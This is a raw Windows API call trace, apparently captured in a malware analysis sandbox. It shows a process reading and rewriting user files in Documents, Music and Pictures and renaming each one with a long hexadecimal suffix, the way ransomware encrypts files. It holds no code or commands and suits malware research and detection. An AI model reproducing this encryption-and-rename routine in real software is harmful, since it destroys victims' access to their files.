GetProcessHeap () returned 0x270000 [0166.572] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.572] RtlInterlockedCompareExchange64 () returned 0x1 [0166.572] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.577] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.577] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.579] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.580] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx", lpString2=".BBB1E6666D48DD04E8F037904DAA375E5C0D7A30BF1BEC5BFC2AFCCB3AE4767C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx.BBB1E6666D48DD04E8F037904DAA375E5C0D7A30BF1BEC5BFC2AFCCB3AE4767C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx.BBB1E6666D48DD04E8F037904DAA375E5C0D7A30BF1BEC5BFC2AFCCB3AE4767C" [0166.581] GetProcessHeap () returned 0x270000 [0166.581] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x42f8d20 [0166.581] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x42f8d20, Length=0x120, FileInformationClass=0xa) returned 0x0 [0166.583] CloseHandle (hObject=0x5ac) returned 1 [0166.584] GetProcessHeap () returned 0x270000 [0166.586] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.586] RtlInterlockedCompareExchange64 () returned 0x1 [0166.586] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.594] ReadFile (in: hFile=0x5b0, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.594] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.595] WriteFile (in: hFile=0x5b0, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.597] RtlInterlockedCompareExchange64 () returned 0x0 [0166.597] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.611] WriteFile (in: hFile=0x5b0, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.612] RtlInterlockedCompareExchange64 () returned 0x0 [0166.612] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.624] WriteFile (in: hFile=0x5b0, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x4200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.625] RtlInterlockedCompareExchange64 () returned 0x0 [0166.625] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.639] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.641] RtlInterlockedCompareExchange64 () returned 0x0 [0166.641] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.652] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.654] RtlInterlockedCompareExchange64 () returned 0x0 [0166.654] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.667] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.669] RtlInterlockedCompareExchange64 () returned 0x0 [0166.669] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.680] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x5600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.681] RtlInterlockedCompareExchange64 () returned 0x0 [0166.681] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.701] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x6600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.703] RtlInterlockedCompareExchange64 () returned 0x0 [0166.703] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.715] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.717] RtlInterlockedCompareExchange64 () returned 0x0 [0166.717] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.732] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x6800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.734] RtlInterlockedCompareExchange64 () returned 0x0 [0166.734] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.747] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.748] RtlInterlockedCompareExchange64 () returned 0x0 [0166.748] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.759] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.760] RtlInterlockedCompareExchange64 () returned 0x0 [0166.760] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.770] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.771] RtlInterlockedCompareExchange64 () returned 0x0 [0166.771] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.786] WriteFile (in: hFile=0x5b0, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.788] RtlInterlockedCompareExchange64 () returned 0x0 [0166.789] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.802] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.805] RtlInterlockedCompareExchange64 () returned 0x0 [0166.805] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.816] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.817] RtlInterlockedCompareExchange64 () returned 0x0 [0166.818] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.846] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.848] RtlInterlockedCompareExchange64 () returned 0x0 [0166.848] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0167.852] ReadFile (in: hFile=0x5b8, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0167.853] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.405] ReadFile (in: hFile=0x5a4, lpBuffer=0x76282d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76081a0 | out: lpBuffer=0x76282d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76081a0) returned 1 [0168.405] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.425] WriteFile (in: hFile=0x5b8, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0168.432] RtlInterlockedCompareExchange64 () returned 0xffffffff [0168.432] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.433] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x744a270, ReturnLength=0x73dfc54) returned 0x0 [0168.434] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3", lpString2=".68EA0A18FB25B6664E23CD0B38D43DF2C5584A09ADFA146DE05AF3CFEB99CE52" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3.68EA0A18FB25B6664E23CD0B38D43DF2C5584A09ADFA146DE05AF3CFEB99CE52") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3.68EA0A18FB25B6664E23CD0B38D43DF2C5584A09ADFA146DE05AF3CFEB99CE52" [0168.434] GetProcessHeap () returned 0x270000 [0168.434] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x116) returned 0x43341b0 [0168.434] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x73dfc44, FileInformation=0x43341b0, Length=0x116, FileInformationClass=0xa) returned 0x0 [0168.437] CloseHandle (hObject=0x598) returned 1 [0168.438] GetProcessHeap () returned 0x270000 [0168.439] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0168.441] RtlInterlockedCompareExchange64 () returned 0x0 [0168.441] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.619] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76900b8, ReturnLength=0x73dfc54) returned 0x0 [0168.620] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif", lpString2=".02D71D8E03D4DDB66B51F5B36D86A3B5F61B9C22A34FB43ADFB7DEED5220336C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif.02D71D8E03D4DDB66B51F5B36D86A3B5F61B9C22A34FB43ADFB7DEED5220336C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif.02D71D8E03D4DDB66B51F5B36D86A3B5F61B9C22A34FB43ADFB7DEED5220336C" [0168.620] GetProcessHeap () returned 0x270000 [0168.620] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x7418598 [0168.621] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x73dfc44, FileInformation=0x7418598, Length=0x140, FileInformationClass=0xa) returned 0x0 [0168.622] CloseHandle (hObject=0x5b8) returned 1 [0168.624] GetProcessHeap () returned 0x270000 [0168.626] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0168.632] RtlInterlockedCompareExchange64 () returned 0x1 [0168.632] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.642] WriteFile (in: hFile=0x5a4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0168.643] RtlInterlockedCompareExchange64 () returned 0x0 [0168.643] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.652] WriteFile (in: hFile=0x5a4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0168.653] RtlInterlockedCompareExchange64 () returned 0x0 [0168.653] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.664] WriteFile (in: hFile=0x5a4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0168.665] RtlInterlockedCompareExchange64 () returned 0x0 [0168.665] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.677] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x73e00f8, ReturnLength=0x73dfc54) returned 0x0 [0168.678] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif", lpString2=".A3C0F467F1D459D475E1803A44992ACBEA363B623D3ACFA76EDD1B8F35B6CA5A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif.A3C0F467F1D459D475E1803A44992ACBEA363B623D3ACFA76EDD1B8F35B6CA5A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif.A3C0F467F1D459D475E1803A44992ACBEA363B623D3ACFA76EDD1B8F35B6CA5A" [0168.678] GetProcessHeap () returned 0x270000 [0168.678] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16c) returned 0x750a2d8 [0168.679] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x73dfc44, FileInformation=0x750a2d8, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0168.681] CloseHandle (hObject=0x5a4) returned 1 [0168.681] GetProcessHeap () returned 0x270000 [0168.682] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0168.682] RtlInterlockedCompareExchange64 () returned 0x1 [0168.682] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.690] ReadFile (in: hFile=0x5b8, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x6600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0168.690] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.693] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76900b8, ReturnLength=0x73dfc54) returned 0x0 [0168.694] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg", lpString2=".380BC593EFE5E29C694B3932AC4EE9BDD6CFD6A7294AD7C0F372CE73E0B9D348" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg.380BC593EFE5E29C694B3932AC4EE9BDD6CFD6A7294AD7C0F372CE73E0B9D348") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg.380BC593EFE5E29C694B3932AC4EE9BDD6CFD6A7294AD7C0F372CE73E0B9D348" [0168.694] GetProcessHeap () returned 0x270000 [0168.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x148) returned 0x4258010 [0168.695] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x73dfc44, FileInformation=0x4258010, Length=0x148, FileInformationClass=0xa) returned 0x0 [0168.698] CloseHandle (hObject=0x5b8) returned 1 [0168.699] GetProcessHeap () returned 0x270000 [0168.700] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0168.700] RtlInterlockedCompareExchange64 () returned 0x1 [0168.700] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.704] ReadFile (in: hFile=0x5b8, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0168.704] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.706] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76900b8, ReturnLength=0x73dfc54) returned 0x0 [0168.707] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg", lpString2=".1A6652A39428A465BA3A771C08C911B8C7B4BD0160AF8DCCCAE6ABAEA7681D0F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg.1A6652A39428A465BA3A771C08C911B8C7B4BD0160AF8DCCCAE6ABAEA7681D0F") 